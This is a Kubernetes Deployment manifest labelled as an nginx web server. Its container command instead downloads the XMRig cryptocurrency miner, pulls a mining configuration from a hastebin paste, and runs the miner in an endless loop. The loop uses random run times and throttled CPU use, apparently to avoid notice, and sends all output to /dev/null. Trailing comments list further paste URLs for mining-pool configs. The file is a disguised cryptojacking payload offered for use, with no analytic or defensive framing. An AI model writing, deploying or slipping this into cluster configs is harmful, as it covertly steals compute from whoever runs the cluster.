apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: nginx3
  name: nginx3
spec:
  replicas: 3
  selector:
    matchLabels:
      app: nginx3
  template:
    metadata:
      labels:
        app: nginx3
    spec:
      containers:
      - image: nginx
        name: nginx3
        command:
          - bash
          - -c 
          - curl -o /var/tmp/xmrig -L https://github.com/xmrig/xmrig/releases/download/v6.14.0/xmrig-6.14.0-linux-x64.tar.gz > /dev/null 2>&1;curl -o /var/tmp/config.json http://hastebin.com/raw/deradepata > /dev/null 2>&1;chmod 777 /var/tmp/xmrig > /dev/null 2>&1;cd /var/tmp > /dev/null 2>&1;tar -xvf xmrig > /dev/null 2>&1;cp xmrig-6.14.0/xmrig ./xmrig;t_min=600;t_max=3600;cpu_min=5;cpu_max=20;while true;do t=$(($t_min + $RANDOM % ($t_max - $t_min)));echo $t;cpu=$(($cpu_max + $t * ($cpu_min - $cpu_max)/($t_max - $t_min)));timeout $t ./xmrig -c config.json --cpu-max-threads=$cpu>&1;sleep $t;done
        resources: {}

        # https://pastebin.com/raw/9sxsXLrM minexmr
        # https://pastebin.com/raw/zpPfSnzT nanopool
        # > /dev/null 2>&1

        # sat 14 august 1900

#minexmr, danted
# http://hastebin.com/raw/gisinolequ

#mxmrbeast, danted
# http://hastebin.com/raw/gociwowamo

# current: 
# http://hastebin.com/raw/safofajora

# 27.8 22:26